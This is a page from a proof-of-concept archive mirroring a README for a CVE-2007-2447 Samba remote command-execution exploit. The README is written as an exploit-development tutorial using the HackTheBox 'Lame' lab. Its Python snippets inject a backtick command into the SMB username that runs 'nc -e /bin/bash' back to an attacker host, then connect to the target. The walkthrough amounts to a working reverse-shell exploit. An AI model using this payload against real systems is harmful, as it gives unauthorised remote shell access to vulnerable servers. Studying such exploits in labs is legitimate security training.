Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2007-2447 PoC — Samba MS-RPC Shell命令注入漏洞

Source
https://github.com/foudadev/CVE-2007-2447
Associated Vulnerability
Title:Samba MS-RPC Shell命令注入漏洞 (CVE-2007-2447)
Description:The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
Readme
# ExploitDev Journey #6 | CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username' map script' Command Execution
Original Exploit: https://www.exploit-db.com/exploits/16320 <br>


**Exploit name:** Samba username map script RCE <br>
**CVE**: 2007-2447 <br>
**Lab**: Lame - HackTheBox


### Description
There is a vulnerability in Samba versions below 3.0.25 that allows an attacker to execute system commands by sending a malformed request as username to the SMB server.

<br>

### How it works
Here is an example of using the `nohup` command to create a directory:
<img src="https://i.ibb.co/4WCvK6S/lame1.png">

Programmatically speaking `/=` means divide and assignment operator usually used in loops. But why do we need to use it here? <br>
The reason for using that is to divide the domain field and username field while sending the request, a better explanation can be found [here](https://0x00sec.org/t/cvexplained-cve-2007-2447/22748).
We use the username field to open a netcat connection and connect to our server.

<br>

### Writing the exploit
Writing the exploit is very easy because there is already a SMB Client library available for Python (install python3-samba package) so all you have to do is to use it like this:
```py
username = f"/=`nohup nc -e /bin/bash {lhost} {lport}`"
conn = SMBConnection(username, '', '', '')

try:
    print("Sending payload")
    conn.connect(rhost, rport, timeout=10)
except Exception as e:
    sys.exit(e)

```

Let's understand how `SMBConnection` works, I provided the `username` but what are the 3 other empty strings? <br>
Those 3 other arguments are: `password`, `my_name` & `remote_name`

For purposes of making our exploit easy to read, we can explicitly write them along with their values but the values for the arguments after `username` are not required:
```py
conn = SMBConnection(username=username, password='', my_name='', remote_name='')
```

The following part is easier to understand, we use the instance of `SMBConnection` class to make a connection and we provide target's IP, port and a timeout number in seconds:
```py
conn.connect(rhost, rport, timeout=10)
```

<br>

### Final thoughts
In this exploit development session you learned about creating an SMB client and connecting to a SMB server. You also learned about Linux commands such as `nohup` which you can later experiment around. You learned about connecting to your attacker machine from the victim machine using netcat which is something that might come useful in your exploit development journey.
File Snapshot

 [4.0K]  /data/pocs/66bf1b2bf49dcdaed3af7074a0293e7a6bc495f7
├── [ 705]  exploit.py
└── [2.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →